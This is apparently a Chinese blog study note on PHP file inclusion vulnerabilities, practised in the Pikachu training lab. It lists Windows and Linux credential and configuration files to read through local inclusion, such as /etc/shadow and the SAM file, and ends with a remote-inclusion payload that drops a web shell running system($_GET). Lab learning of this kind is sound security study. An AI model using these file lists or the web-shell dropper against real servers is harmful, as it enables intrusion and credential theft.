文件包含漏洞的学习(含pikachu练习)

和SQL注入等攻击方式一样，文件包含漏洞也是一种“注入型漏洞”，其本质就是输入一段用户能够控制的脚本或者代码，并让服务器端执行。

对于包含
以PHP为例，我们常常把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程就叫做包含

程序开发人员都希望代码更加灵活，所以通常会将被包含的文件设置为变量，用来进行动态调用，但正是由于这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。
以php，webapplication 中居多。jsp，asp，很少。
这与程序开发人员的水平无关，而问题在于语言设计的弊端。

allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据
allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件

本地文件包含
仅能够对服务器本地的文件进行包含，由于服务器上的文件并不是攻击者所能够控制的，因此该情况下，攻击着更多的会包含一些 固定的系统配置文件，从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞，从而形成更大的威力。

远程文件包含漏洞
能够通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说的，准备挂彩。
因此，在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数，如果非要这么做，也一定要做严格的白名单策略进行过滤。
你可以通过“File Inclusion”对应的测试栏目，来进一步的了解该漏洞。

Windows系统
c:\boot.ini // 查看系统版本
C:\Windows\System32\config\sam // 存储Windows系统初次安装的密码 c:\ProgramFiles\mysql\my.ini // MySQL配置 c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码 c:\windows\php.ini // php 配置信息

Linux/Unix系统、
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件
/etc/resolv.conf
/root/.ssh/known_hosts
/usr/local/app/php5/lib/php.ini // PHP相关配置
/etc/httpd/conf/httpd.conf // Apache配置文件
/etc/my.conf // mysql 配置文件
可以写入字典，爆破可返回包的长度来爆破站点的路径

先在服务器本地新建个php文件：
98.php文件下的代码：<?php echo phpinfo();?>

下拉菜单选择查询是正常使用的

但是我们在本地新建了个php文件是不是可以通过参数的形式传递进去呢？
把上图的file1.php改为我们在服务器端新建的php文件98.php

因为后端php代码里使用了include包含了一个动态变量，这会产生文件包含漏洞

点击做题界面显示叫你在php.ini打开allow_url_include
接下来我们就去打开呀

这里我们将箭头指的地方改成On
就可以看到恢复正常了

在其他地址设置脚本
hack.txt:

<?php
    $myfile = fopen("hack.php", "w");
    $txt = '<?php system($_GET["hack"]);?>';
    fwrite($myfile, $txt);
    fclose($myfile);
?>

是GET的请求方式的话, 就可以直接通过URL来执行了:
http://192.168.43.147/pikachu-master/test/hack.txt

可以看到txt变成了php，就是把txt当成php解析
假如权限不够的话可能会出现警告